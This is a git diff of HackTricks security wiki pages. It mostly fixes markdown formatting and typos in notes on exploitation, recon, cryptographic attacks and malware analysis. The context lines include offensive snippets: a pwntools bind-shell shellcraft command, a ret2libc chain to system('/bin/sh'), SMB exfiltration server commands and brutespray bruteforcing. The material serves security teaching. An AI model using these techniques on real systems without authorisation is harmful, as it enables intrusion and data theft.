@@ -156,7 +156,7 @@ For sake of simplicity, most of the people will generate and share a link instea Some proposed ways to find all the documents: * Search in internal chat, forums... -* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)**** +* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) ### **Keep Notes** @@ -198,7 +198,7 @@ The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **sc In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization. -You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)**** +You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch) ## Account Compromised Recovery diff --git a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md index 7bcc607c..47789094 100644 --- a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md +++ b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md 
@@ -2,7 +2,7 @@ ## eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses -### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)**** +### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting) This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**. 
@@ -11,7 +11,7 @@ I found the course to be a great one for **people that don't have any experience Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\ Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks. -### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)**** +### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting) When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\ However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.** 
@@ -33,7 +33,7 @@ In this exam I **missed the opportunity to exploit more vulnerabilities**, howev ## eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related -### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**** +### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme) This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \ Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities. @@ -56,7 +56,7 @@ It's a very interesting basic course about **how to use the ML environment provi ## Course: **Machine Learning with scikit-learn Starter Pass** -In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. +In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. It's definitely recommended for people that haven't use scikit-learn (but know python) 
@@ -74,4 +74,4 @@ It also explains **how to create tree models** with scikit-learn different techn The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**. -## +## diff --git a/cryptography/certificates.md b/cryptography/certificates.md index 79ac4265..a2c285ac 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md 
@@ -43,7 +43,7 @@ The most common format for public key certificates is defined by [X.509](https:/ * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example (the last par of the chain). - * **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key. + * **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key. * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. * **Authority Information Access** (AIA): This extension contains at most two types of information : * Information about **how to get the issuer of this certificate** (CA issuer access method) diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index 9cedd5e2..224316fc 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md 
+++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -34,7 +34,7 @@ Imagine you are encrypting the name **Administrator** in **8bytes** blocks: You can create a username called **Administ** (m1) and retrieve the signature (s1).\ Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ -now, you can use s32 as the singature of the full name **Administrator**. +now, you can use s32 as the signature of the full name **Administrator**. #### Summary diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index ee25be69..9d21ef72 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -16,9 +16,9 @@ ## Magic Autosolvers -* ****[**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)**** -* ****[https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)**** (Magic module) -* ****[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)**** +* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module) +* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) ## Encoders diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index af12e297..d84c77d8 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md 
@@ -7,7 +7,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret* * **The length of the secret** (this can be also bruteforced from a given length range) * **The clear text data** * **The algorithm (and it's vulnerable to this attack)** -* **The padding is known** +* **The padding is known** * Usually a default one is used, so if the other 3 requirements are met, this also is * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index 59258670..b17676a3 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -8,5 +8,5 @@ If you can encrypt a known plaintext you can also extract the password. More ref {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} -**** + diff --git a/emails-vulns.md b/emails-vulns.md index bc6d1ead..5078fbf8 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -8,7 +8,7 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i * E.g. john.doe+intigriti@example.com → john.doe@example.com -**Comments between parentheses ()** at the beginning or the end will also be ignored +**Comments between parentheses ()** at the beginning or the end will also be ignored * E.g. john.doe(intigriti)@example.com → john.doe@example.com @@ -46,7 +46,7 @@ You can send an email using _**From: company.com**_** ** and _**Replay-To: attac ## **References** -* ****[**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)**** +* [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view) ## Hard Bounce Rate diff --git a/exfiltration.md b/exfiltration.md index a1d0ead3..6120f9d8 100644 --- a/exfiltration.md +++ b/exfiltration.md 
@@ -151,7 +151,7 @@ kali_op2> smbserver.py -smb2support name /path/folder # Share a folder impacket-smbserver -smb2support -user test -password test test `pwd` ``` -Or create a \*\*smb \*\*share **using samba**: +Or create a **smb **share **using samba**: ```bash apt-get install samba diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 2c77353d..3696a277 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -51,7 +51,7 @@ int i = 5; Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso. -\*\*\*\* + Para obtener la dirección de una función dentro de un programa se puede hacer: @@ -250,7 +250,7 @@ Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecuci RELLENO -* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) +* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) * En el EIP ponemos de dirección una función &(leave;ret) Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/sh” 
@@ -657,7 +657,7 @@ So what's the **bypass**? The typical bypass I use is to just don't write to mem Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions: * Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution. -* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. `` `** ``-z relro`**`y`**`-z now\`\*\* +* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. `` `** ``-z relro`**`y`**`-z now\`** To check if a program uses Bind now you can do: @@ -665,7 +665,7 @@ To check if a program uses Bind now you can do: readelf -l /proc/ID_PROC/exe | grep BIND_NOW ``` -\*\*\*\* + Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT (Procedure Linkage Table), de aquí se realiza un salto (jmp) a la GOT y descubre que esa entrada no ha sido resuelta (contiene una dirección siguiente de la PLT). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. @@ -1072,4 +1072,4 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu ## **References** -* \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)\*\*\*\* +* [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html) diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md index 7f4a85c3..f868d932 100644 
--- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md @@ -175,7 +175,7 @@ ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64) ``` -We get 2 matches (you should try the second one if the first one is not working). Download the first one: +We get 2 matches (you should try the second one if the first one is not working). Download the first one: ``` ./download libc6_2.23-0ubuntu10_amd64 @@ -204,7 +204,7 @@ At this point we should know the libc library used. As we are exploiting a local So, at the begging of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` -Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. +Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. Inside the `get_addr`function the **base address of libc** is going to be calculated: diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md index b1bc7e4f..b1eb2e2e 100644 --- a/exploiting/tools/README.md +++ b/exploiting/tools/README.md @@ -115,7 +115,7 @@ While debugging GDB will have **slightly different addresses than the used by th * `unset env COLUMNS` * `set env _=` _Put the absolute path to the binary_ * Exploit the binary using the same absolute route -* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary #### Backtrace to find functions called 
@@ -140,7 +140,7 @@ gef➤ bt ### Find stack offset **Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -****For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ +For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ ![](<../../.gitbook/assets/image (616).png>) @@ -202,6 +202,6 @@ Inside the IDA folder you can find binaries that can be used to debug a binary i ./linux_server64 -Ppass ``` - Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Then, configure the debugger: Debugger (linux remote) --> Proccess options...: ![](<../../.gitbook/assets/image (101).png>) diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 9f3754c5..dd6f1a3e 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -4,25 +4,25 @@ pip3 install pwntools ``` -## Pwn asm +## Pwn asm -Get opcodes from line or file. +Get opcodes from line or file. ``` pwn asm "jmp esp" pwn asm -i ``` -**Can select:** +**Can select:** * output type (raw,hex,string,elf) * output file context (16,32,64,linux,windows...) -* avoid bytes (new lines, null, a list) +* avoid bytes (new lines, null, a list) * select encoder debug shellcode using gdb run the output -## **Pwn checksec** +## **Pwn checksec** -Checksec script +Checksec script ``` pwn checksec @@ -30,7 +30,7 @@ pwn checksec ## Pwn constgrep -## Pwn cyclic +## Pwn cyclic Get a pattern 
@@ -39,7 +39,7 @@ pwn cyclic 3000 pwn cyclic -l faad ``` -**Can select:** +**Can select:** * The used alphabet (lowercase chars by default) * Length of uniq pattern (default 4) @@ -56,21 +56,21 @@ pwn debug --pid 1234 pwn debug --process bash ``` -**Can select:** +**Can select:** -* By executable, by name or by pid context (16,32,64,linux,windows...) -* gdbscript to execute +* By executable, by name or by pid context (16,32,64,linux,windows...) +* gdbscript to execute * sysrootpath -## Pwn disablenx +## Pwn disablenx -Disable nx of a binary +Disable nx of a binary ``` pwn disablenx ``` -## Pwn disasm +## Pwn disasm Disas hex opcodes @@ -78,13 +78,13 @@ Disas hex opcodes pwn disasm ffe4 ``` -**Can select:** +**Can select:** -* context (16,32,64,linux,windows...) -* base addres +* context (16,32,64,linux,windows...) +* base addres * color(default)/no color -## Pwn elfdiff +## Pwn elfdiff Print differences between 2 fiels @@ -92,7 +92,7 @@ Print differences between 2 fiels pwn elfdiff ``` -## Pwn hex +## Pwn hex Get hexadecimal representation @@ -100,25 +100,25 @@ Get hexadecimal representation pwn hex hola #Get hex of "hola" ascii ``` -## Pwn phd +## Pwn phd -Get hexdump +Get hexdump ``` pwn phd ``` - **Can select:** +**Can select:** -* Number of bytes to show -* Number of bytes per line highlight byte +* Number of bytes to show +* Number of bytes per line highlight byte * Skip bytes at beginning -## Pwn pwnstrip +## Pwn pwnstrip ## Pwn scrable -## Pwn shellcraft +## Pwn shellcraft Get shellcodes 
@@ -136,18 +136,18 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port * Out file * output format * debug (attach dbg to shellcode) -* before (debug trap before code) +* before (debug trap before code) * after * avoid using opcodes (default: not null and new line) * Run the shellcode * Color/no color -* list syscalls -* list possible shellcodes +* list syscalls +* list possible shellcodes * Generate ELF as a shared library -## Pwn template +## Pwn template -Get a python template +Get a python template ``` pwn template @@ -155,15 +155,15 @@ pwn template **Can select:** host, port, user, pass, path and quiet -## Pwn unhex +## Pwn unhex -From hex to string +From hex to string ``` pwn unhex 686f6c61 ``` -## Pwn update +## Pwn update To update pwntools diff --git a/external-recon-methodology.md b/external-recon-methodology.md index 463156c4..c0617874 100644 --- a/external-recon-methodology.md +++ b/external-recon-methodology.md 
@@ -33,8 +33,8 @@ An autonomous system number \(**ASN**\) is a **unique number** assigned to an ** An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs. -**\*\*You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**. -Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link\*\*. +You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**. +Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link**. ```bash #You can try "automate" this with amass, but it's not very recommended 
@@ -48,8 +48,8 @@ You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4 ### Looking for vulnerabilities At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts. -Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) **\*\*or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. -Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce\*\* services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). +Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. +Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). ## Domains 
@@ -81,8 +81,8 @@ You can use online tools like: * [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** * [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** * [https://www.reversewhois.io/](https://www.reversewhois.io/) - **Free** -* \*\*\*\*[https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API. -* \*\*\*\*[http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free +* [https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API. +* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free * [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free \(only **100 free** searches\) * [https://www.domainiq.com/](https://www.domainiq.com/) - Not Free @@ -98,10 +98,10 @@ For example, if you see the same **Google Analytics ID** or the same **Adsense I There are some pages that let you search by these trackers and more: -* [**BuiltWith**](https://builtwith.com/)\*\*\*\* -* \*\*\*\*[**Sitesleuth**](https://www.sitesleuth.io/)\*\*\*\* -* \*\*\*\*[**Publicwww**](https://publicwww.com/)\*\*\*\* -* \*\*\*\*[**SpyOnWeb**](http://spyonweb.com/)\*\*\*\* +* [**BuiltWith**](https://builtwith.com/) +* [**Sitesleuth**](https://www.sitesleuth.io/) +* [**Publicwww**](https://publicwww.com/) +* [**SpyOnWeb**](http://spyonweb.com/) ### **Favicon** 
@@ -300,7 +300,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**. -To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), **\*\*\[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), \[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** ## Recapitulation 1 
@@ -350,7 +350,7 @@ Now that we have built the list of assets of our scope it's time to search for s You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key) -## [**Pentesting Web Methodology**](pentesting/pentesting-web/)\*\*\*\* +## [**Pentesting Web Methodology**](pentesting/pentesting-web/) Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/). diff --git a/external-recon-methodology/README.md b/external-recon-methodology/README.md index 8c14e8df..c50e481d 100644 --- a/external-recon-methodology/README.md +++ b/external-recon-methodology/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -39,7 +39,7 @@ An autonomous system number (**ASN**) is a **unique number** assigned to an **au An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\ -**You can search by** company name\*\*, by\*\* IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net)**.**\ +**You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net)**.**\ **Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link. ```bash 
@@ -54,7 +54,7 @@ You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4 ### Looking for vulnerabilities At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\ -Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running\*\*.\*\*\ +Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.**\ **Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). ## Domains 
@@ -320,7 +320,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**. -To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), **\*\*\[shutter]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), \[shutter]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** ## Cloud Assets diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index 8147b692..eb0a7f0c 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md 
@@ -70,11 +70,11 @@ IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifi To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -****You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. +You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. ### Loki -****[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ +[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ Detection is based on four detection methods: ``` 
@@ -93,7 +93,7 @@ Detection is based on four detection methods: ### Linux Malware Detect -****[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. ### rkhunter 
